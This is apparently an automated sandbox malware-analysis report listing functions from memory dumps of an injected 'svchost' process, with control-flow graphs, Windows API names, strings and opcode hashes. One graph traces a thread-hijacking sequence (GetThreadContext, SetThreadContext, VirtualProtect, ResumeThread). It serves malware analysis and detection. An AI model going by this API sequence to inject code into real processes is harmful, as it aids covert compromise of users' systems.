                                            • Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                            • Instruction ID: e6e00d3cec3b77a6a90c9ec39f0c43c6408aef7a54a59689b67cb6274e0b0fd7
                                            • Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                            • Instruction Fuzzy Hash: FB81D13170464586FFD0EB2A998D39D7A94ABD5B80F4C8425AA0877796DB3BC8418F13

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 532 26a879c9804-26a879c9842 533 26a879c9848-26a879c984b 532->533 534 26a879c9933 532->534 535 26a879c9935-26a879c9951 533->535 536 26a879c9851 533->536 534->535 537 26a879c9854 536->537 538 26a879c985a-26a879c9869 537->538 539 26a879c992b 537->539 540 26a879c9876-26a879c9895 LoadLibraryExW 538->540 541 26a879c986b-26a879c986e 538->541 539->534 544 26a879c9897-26a879c98a0 call 26a879d3080 540->544 545 26a879c98ed-26a879c9902 540->545 542 26a879c9874 541->542 543 26a879c990d-26a879c991c call 26a879d3090 541->543 548 26a879c98e1-26a879c98e8 542->548 543->539 552 26a879c991e-26a879c9929 543->552 553 26a879c98a2-26a879c98b7 call 26a879cad28 544->553 554 26a879c98cf-26a879c98d9 544->554 545->543 546 26a879c9904-26a879c9907 FreeLibrary 545->546 546->543 548->537 552->535 553->554 557 26a879c98b9-26a879c98cd LoadLibraryExW 553->557 554->548 557->545 557->554
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2970298836.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_26a879c0000_svchost.jbxd
                                            Similarity
                                            • API ID: Library$Load$AddressErrorFreeLastProc
                                            • String ID: api-ms-
                                            • API String ID: 2559590344-2084034818
                                            • Opcode ID: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
                                            • Instruction ID: 46faaff618465698a6995b51eff2aa39a1bd3dd032481dc3d2b297d9d9beb68c
                                            • Opcode Fuzzy Hash: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
                                            • Instruction Fuzzy Hash: CF31C131212A40D1FF92DB06E80879D77A8BB98BB4F5A4524ED2D2B394DF39C445CB02

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2970298836.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_26a879c0000_svchost.jbxd
                                            Similarity
                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                            • String ID: CONOUT$
                                            • API String ID: 3230265001-3130406586
                                            • Opcode ID: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
                                            • Instruction ID: 195ee54b184dfd1d4a94bbabb291892d4747d69da2f14ea1dda46ef7d3bb7c40
                                            • Opcode Fuzzy Hash: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
                                            • Instruction Fuzzy Hash: E211BC32314B4086F790CB12E84831DBEA4F789FE5F004225EA5D977A4DF3AC9048B41

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 581 26a879c5c10-26a879c5c37 582 26a879c5c39-26a879c5c48 581->582 583 26a879c5c4b-26a879c5c56 GetCurrentThreadId 581->583 582->583 584 26a879c5c58-26a879c5c5d 583->584 585 26a879c5c62-26a879c5c69 583->585 586 26a879c608f-26a879c60a6 call 26a879c7a20 584->586 587 26a879c5c7b-26a879c5c8f 585->587 588 26a879c5c6b-26a879c5c76 call 26a879c5a40 585->588 591 26a879c5c9e-26a879c5ca4 587->591 588->586 594 26a879c5d75-26a879c5d96 591->594 595 26a879c5caa-26a879c5cb3 591->595 600 26a879c5eff-26a879c5f10 call 26a879c759f 594->600 601 26a879c5d9c-26a879c5dbc GetThreadContext 594->601 597 26a879c5cb5-26a879c5cf8 call 26a879c86a0 595->597 598 26a879c5cfa-26a879c5d6d call 26a879c45f0 call 26a879c4590 call 26a879c4550 595->598 611 26a879c5d70 597->611 598->611 615 26a879c5f15-26a879c5f1b 600->615 604 26a879c5dc2-26a879c5de3 601->604 605 26a879c5efa 601->605 604->605 614 26a879c5de9-26a879c5df2 604->614 605->600 611->591 619 26a879c5e72-26a879c5e83 614->619 620 26a879c5df4-26a879c5e05 614->620 616 26a879c5fde-26a879c5fee 615->616 617 26a879c5f21-26a879c5f78 VirtualProtect FlushInstructionCache 615->617 626 26a879c5ffe-26a879c600a call 26a879c4ed0 616->626 627 26a879c5ff0-26a879c5ff7 616->627 621 26a879c5fa9-26a879c5fd9 call 26a879c798c 617->621 622 26a879c5f7a-26a879c5f84 617->622 623 26a879c5ef5 619->623 624 26a879c5e85-26a879c5ea3 619->624 628 26a879c5e07-26a879c5e1c 620->628 629 26a879c5e6d 620->629 621->615 622->621 630 26a879c5f86-26a879c5fa1 call 26a879c4470 622->630 624->623 631 26a879c5ea5-26a879c5ef0 call 26a879c39e0 call 26a879c75bd 624->631 645 26a879c600f-26a879c6015 626->645 627->626 633 26a879c5ff9 call 26a879c44c0 627->633 628->629 635 26a879c5e1e-26a879c5e68 call 26a879c3a50 SetThreadContext 628->635 629->623 630->621 631->623 633->626 635->629 646 26a879c6057-26a879c6075 645->646 647 26a879c6017-26a879c6055 ResumeThread call 26a879c798c 645->647 650 26a879c6077-26a879c6086 646->650 651 26a879c6089 646->651 647->645 650->651 651->586
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2970298836.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_26a879c0000_svchost.jbxd
                                            Similarity
                                            • API ID: Thread$Current$Context
                                            • String ID:
                                            • API String ID: 1666949209-0
                                            • Opcode ID: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
                                            • Instruction ID: 668ed7f2667091ced11d858c5786cb119bf8f80e5a5e4a6a64a44aaa3e9ecd61
                                            • Opcode Fuzzy Hash: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
                                            • Instruction Fuzzy Hash: 50D18C76208B8881EAB0DB1AE49435E7BB4F3D8B84F154216EA8D57BA5DF39C541CF01
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2970298836.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_26a879c0000_svchost.jbxd
                                            Similarity
                                            • API ID: Heap$Process$AllocFree
                                            • String ID: dialer
                                            • API String ID: 756756679-3528709123
                                            • Opcode ID: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
                                            • Instruction ID: 4e4df6a00d47054bd9678bac00e72608e7238581d895763a19b039f4903db13a
                                            • Opcode Fuzzy Hash: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
                                            • Instruction Fuzzy Hash: DA31A231701B519AFF95DF16A84826D7BA0FB84B94F0881209F8C27B55EF3AC4A1CB02
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2970298836.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_26a879c0000_svchost.jbxd
                                            Similarity
                                            • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                            • String ID:
                                            • API String ID: 517849248-0
                                            • Opcode ID: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
                                            • Instruction ID: fa2f4e6e1173dce71ba7fbc21c8ec9abc64c048dfb6ec85f973e965938c3ec86
                                            • Opcode Fuzzy Hash: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
                                            • Instruction Fuzzy Hash: B4016971300A4196FB90DB12A85C35D7BA1F788FC1F888035CE8D53B54DE3EC9898B41
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2970298836.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_26a879c0000_svchost.jbxd
                                            Similarity
                                            • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                            • String ID:
                                            • API String ID: 449555515-0
                                            • Opcode ID: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
                                            • Instruction ID: 88e1dc055e24f007908cfd903687df20f7c2d2507063046347e7f2aeeb900160
                                            • Opcode Fuzzy Hash: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
                                            • Instruction Fuzzy Hash: A5111775611B41C2FBA4DB65E81D75E7EB0BB88B82F040429CA4D27764EF3EC4088B02
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2970298836.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_26a879c0000_svchost.jbxd
                                            Similarity
                                            • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                            • String ID: csm$f
                                            • API String ID: 2395640692-629598281
                                            • Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                            • Instruction ID: 6ab0d891425302b41ef9979ff86cf2d6f11ac9e1349dcf3938e42dc16432e1c0
                                            • Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                            • Instruction Fuzzy Hash: 8A51BD32311640CAEF94CF25E44CB5D3BA5F3A4BA8F528120DE4A67788EB37D941CB02
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2970298836.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_26a879c0000_svchost.jbxd
                                            Similarity
                                            • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                            • String ID: csm$f
                                            • API String ID: 2395640692-629598281
                                            • Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                            • Instruction ID: cb143f3d6994fee4eb32646ee3a4132a5777a16b8d7ef106b84b70684e1f550f
                                            • Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                            • Instruction Fuzzy Hash: 1531C032210680DAEB94DF11E84C71D3BA5F794BA8F058114AE4A27785DB3AD941CB06
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2970298836.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_26a879c0000_svchost.jbxd
                                            Similarity
                                            • API ID: FinalHandleNamePathlstrlen
                                            • String ID: \\?\
                                            • API String ID: 2719912262-4282027825
                                            • Opcode ID: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
                                            • Instruction ID: 8ba78bf88c1916c61f564416cb90b9acd9514bc905b3ba5d15dab470fb65a13c
                                            • Opcode Fuzzy Hash: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
                                            • Instruction Fuzzy Hash: 5BF03C7230464196FBA0CB21F99835D7F61F784B99F848020CA4D57959EE6EC688CF01
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2970298836.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_26a879c0000_svchost.jbxd
                                            Similarity
                                            • API ID: CombinePath
                                            • String ID: \\.\pipe\
                                            • API String ID: 3422762182-91387939
                                            • Opcode ID: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
                                            • Instruction ID: adf10e1541d886bfc46832840359db2901279f5cca05dbc69dded0e73e1861d5
                                            • Opcode Fuzzy Hash: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
                                            • Instruction Fuzzy Hash: 7FF08230704B80D2FE80CB13B90811DBE21EB88FD1F088131DE5E27B28DE2DC4418B02
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2970298836.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_26a879c0000_svchost.jbxd
                                            Similarity
                                            • API ID: AddressFreeHandleLibraryModuleProc
                                            • String ID: CorExitProcess$mscoree.dll
                                            • API String ID: 4061214504-1276376045
                                            • Opcode ID: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
                                            • Instruction ID: 0ba0d654cb6f18296789ccbe063357a8a2b3fcf1d8cae2d0dced513f39d16d73
                                            • Opcode Fuzzy Hash: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
                                            • Instruction Fuzzy Hash: A6F0FE7132164492FFD4CF60E89836D3F60EB88B91F442019994FA7574DE29C488CF12
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2970298836.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_26a879c0000_svchost.jbxd
                                            Similarity
                                            • API ID: CurrentThread
                                            • String ID:
                                            • API String ID: 2882836952-0
                                            • Opcode ID: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
                                            • Instruction ID: b5e59098baef328b6d7bdbe74c7cb822dd7390226da7e9ac6dd182fe16b175d4
                                            • Opcode Fuzzy Hash: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
                                            • Instruction Fuzzy Hash: D402BA36219B80C6EBA0CB55E49435EBBA0F3D4794F205116EA8E97BA9DF7DC484CF01
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2970298836.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_26a879c0000_svchost.jbxd
                                            Similarity
                                            • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                                            • String ID:
                                            • API String ID: 2210144848-0
                                            • Opcode ID: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
                                            • Instruction ID: 46f073674741d853182dd06e49b026107be083b4c17cd02207308e0e43a20ad0
                                            • Opcode Fuzzy Hash: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
                                            • Instruction Fuzzy Hash: EB81C032B1065089FBD0DB69D94C3AD3FA1F784B98F444156DE1A77792DB36C441CB22
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2970298836.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_26a879c0000_svchost.jbxd
                                            Similarity
                                            • API ID: CurrentThread
                                            • String ID:
                                            • API String ID: 2882836952-0
                                            • Opcode ID: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
                                            • Instruction ID: d90cda66bbfad1debd14c78d4e1d40b92ccf3fbe301fd6ccc73bba502c12dda2
                                            • Opcode Fuzzy Hash: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
                                            • Instruction Fuzzy Hash: A561DA36519B40C6EBA0CB15E45831EBBE4F3D8754F605216EA8E67BA8DB7EC540CF01
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2969236862.0000026A87990000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A87990000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_26a87990000_svchost.jbxd
                                            Similarity
                                            • API ID: _set_statfp
                                            • String ID:
                                            • API String ID: 1156100317-0
                                            • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                            • Instruction ID: 7ef8aaefcf1b905b68fa67122955c18c980f192bf2e6b4bd5c6510424708fb32
                                            • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                            • Instruction Fuzzy Hash: 19112532EC3E0001FBE41969E55E3ADB0706B54374F090224AB7637BDAFE1ACC424A07
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2970298836.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_26a879c0000_svchost.jbxd
                                            Similarity
                                            • API ID: _set_statfp
                                            • String ID:
                                            • API String ID: 1156100317-0
                                            • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                            • Instruction ID: 325e6dd0d984f579dabc2df724599173956b793cad1da30d5df66ae2e0b34588
                                            • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                            • Instruction Fuzzy Hash: A211A373A98B0001F6D891ADE45F3AD3C40EB64374F5A0625AB76373E6AB1ACC814906
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2970298836.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_26a879c0000_svchost.jbxd
                                            Similarity
                                            • API ID: CurrentProcessProtectVirtual$HandleModule
                                            • String ID:
                                            • API String ID: 1092925422-0
                                            • Opcode ID: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
                                            • Instruction ID: 9cb059389f430eefe55732830a83e879fcbc2c0922e6bfc06ba8584c724dddf5
                                            • Opcode Fuzzy Hash: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
                                            • Instruction Fuzzy Hash: 5011FA3A705B4182FF949B51F40826D7AB4F788B85F044029DE8D17795EE3EC545CB06
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2969236862.0000026A87990000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A87990000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_26a87990000_svchost.jbxd
                                            Similarity
                                            • API ID: CurrentImageNonwritable__except_validate_context_record
                                            • String ID: csm$f
                                            • API String ID: 3242871069-629598281
                                            • Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                            • Instruction ID: 9c9adf42bdbe15e594f47225c290312529cae0cac6b0b1dfddc7f7636dbbf591
                                            • Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                            • Instruction Fuzzy Hash: 3F51A332712A009BFB94CF15E488F5D37A5F384B98F528128DA1A6B788DB36D945CF07
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2969236862.0000026A87990000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A87990000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_26a87990000_svchost.jbxd
                                            Similarity
                                            • API ID: CurrentImageNonwritable__except_validate_context_record
                                            • String ID: csm$f
                                            • API String ID: 3242871069-629598281
                                            • Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                            • Instruction ID: 59c4ffac785529dcdcadff87240a1ef8f544bfcca855935e61c0aa6ef90fdcab
                                            • Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                            • Instruction Fuzzy Hash: 8D31D172211740A6F794DF11E888F1D77A4F780BC8F168018EE4A67788CB3AC944CB07
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2970298836.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_26a879c0000_svchost.jbxd
                                            Similarity
                                            • API ID: Heap$Process$Free
                                            • String ID:
                                            • API String ID: 3168794593-0
                                            • Opcode ID: 5f7cef85691391bfd1f64b5ed8b2db0144129af346a3a3b2b5e725a5d1a6a2a2
                                            • Instruction ID: 503738bbb351b992aa054f619d5032a0360e56ad1c0bab80166c19a25c48d67a
                                            • Opcode Fuzzy Hash: 5f7cef85691391bfd1f64b5ed8b2db0144129af346a3a3b2b5e725a5d1a6a2a2
                                            • Instruction Fuzzy Hash: 2A115832514B89D2FB94DFA6A84821E7F60F789B85F044129EB8E23755EF3AC0518B45
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2970298836.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_26a879c0000_svchost.jbxd
                                            Similarity
                                            • API ID: FileType
                                            • String ID: \\.\pipe\
                                            • API String ID: 3081899298-91387939
                                            • Opcode ID: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
                                            • Instruction ID: b7904aae615f521d7812c3f5e65d9e24a3ce78fdd2b7a407f501b4ad358c7a2d
                                            • Opcode Fuzzy Hash: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
                                            • Instruction Fuzzy Hash: 9571D43220478186EFA4DF259A483EEB790F7C5B84F444016DE4E63B99DE36C6848F42
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2970298836.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_26a879c0000_svchost.jbxd
                                            Similarity
                                            • API ID: FileType
                                            • String ID: \\.\pipe\
                                            • API String ID: 3081899298-91387939
                                            • Opcode ID: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
                                            • Instruction ID: a6c0abc4f2a2b75ba774e9e6d1f259500821b8a5541e7079b06ca42121c14c5d
                                            • Opcode Fuzzy Hash: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
                                            • Instruction Fuzzy Hash: 9551DD32204B8182EEF4DF29965C3AEB751F7C5780F454026DE8A23B99DE3BC4458F52
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2970298836.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_26a879c0000_svchost.jbxd
                                            Similarity
                                            • API ID: ErrorFileLastWrite
                                            • String ID: U
                                            • API String ID: 442123175-4171548499
                                            • Opcode ID: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
                                            • Instruction ID: 8ca21fce6d0e22c8cf5732f9377e562903c25c7ef9583250b87a770ae0f6e834
                                            • Opcode Fuzzy Hash: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
                                            • Instruction Fuzzy Hash: A341C672715A8081EBA0DF69E8483AE7FA0F798784F844125EE4D97798DB3DC541CF41
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2970298836.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_26a879c0000_svchost.jbxd
                                            Similarity
                                            • API ID: Stringtry_get_function
                                            • String ID: LCMapStringEx
                                            • API String ID: 2588686239-3893581201
                                            • Opcode ID: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
                                            • Instruction ID: 109b6a62fa6fb2b36cdbe3fe010a87026b8d3f57eb8c45ceefd888f193cb09d2
                                            • Opcode Fuzzy Hash: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
                                            • Instruction Fuzzy Hash: 1C111A36608B8086DBA0CB56F88429ABBA4F7C9B90F544126EECD93B59DF38C550CB00
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2970298836.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_26a879c0000_svchost.jbxd
                                            Similarity
                                            • API ID: ExceptionFileHeaderRaise
                                            • String ID: csm
                                            • API String ID: 2573137834-1018135373
                                            • Opcode ID: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
                                            • Instruction ID: dcf103bb4589dd5b540d64a674de9561a88b06da2b8737606ccbc7e3f2d77857
                                            • Opcode Fuzzy Hash: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
                                            • Instruction Fuzzy Hash: C1111C32218B80C2EBA18F15E54425DBBA5F798BA8F584225DF8D1BB68DF39C555CB00
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2970298836.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_26a879c0000_svchost.jbxd
                                            Similarity
                                            • API ID: CountCriticalInitializeSectionSpintry_get_function
                                            • String ID: InitializeCriticalSectionEx
                                            • API String ID: 539475747-3084827643
                                            • Opcode ID: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
                                            • Instruction ID: 03b0360fd42107760eec48b338194edc7a88d918eba2d166d42b9dffb87d2d1d
                                            • Opcode Fuzzy Hash: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
                                            • Instruction Fuzzy Hash: 88F0E231314B8082FBD4DB41F50829C7F20ABC8B80F884025AE4D23B24CF3AC994CF02
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2969236862.0000026A87990000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A87990000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_26a87990000_svchost.jbxd
                                            Similarity
                                            • API ID: try_get_function
                                            • String ID: November$October
                                            • API String ID: 2742660187-1636048786
                                            • Opcode ID: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
                                            • Instruction ID: 9650eb30da5b7a6529ee697977e8b296c7743997b23b3ce03466238b801360dd
                                            • Opcode Fuzzy Hash: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
                                            • Instruction Fuzzy Hash: 54E0927120554192FB84DB69F8483ECB221DBA4740F695022951927362CF3ACC86CB42
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2970298836.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_26a879c0000_svchost.jbxd
                                            Similarity
                                            • API ID: Valuetry_get_function
                                            • String ID: FlsSetValue
                                            • API String ID: 738293619-3750699315
                                            • Opcode ID: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
                                            • Instruction ID: 35d45f319071ec7e043f06cd9aaf194d67642004657d02158ade06abddba33c1
                                            • Opcode Fuzzy Hash: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
                                            • Instruction Fuzzy Hash: E2E06D71204A4092FED4CB54F90C69C7E22ABC8780F988022D90D27365CE3AC895CF12
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2970298836.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_26a879c0000_svchost.jbxd
                                            Similarity
                                            • API ID: Heap$Process$AllocFree
                                            • String ID:
                                            • API String ID: 756756679-0
                                            • Opcode ID: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
                                            • Instruction ID: b0d2f8c75bfc013734b9faa92ae29b0f6fef55afc5c9f2525d95d49fb7accf6f
                                            • Opcode Fuzzy Hash: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
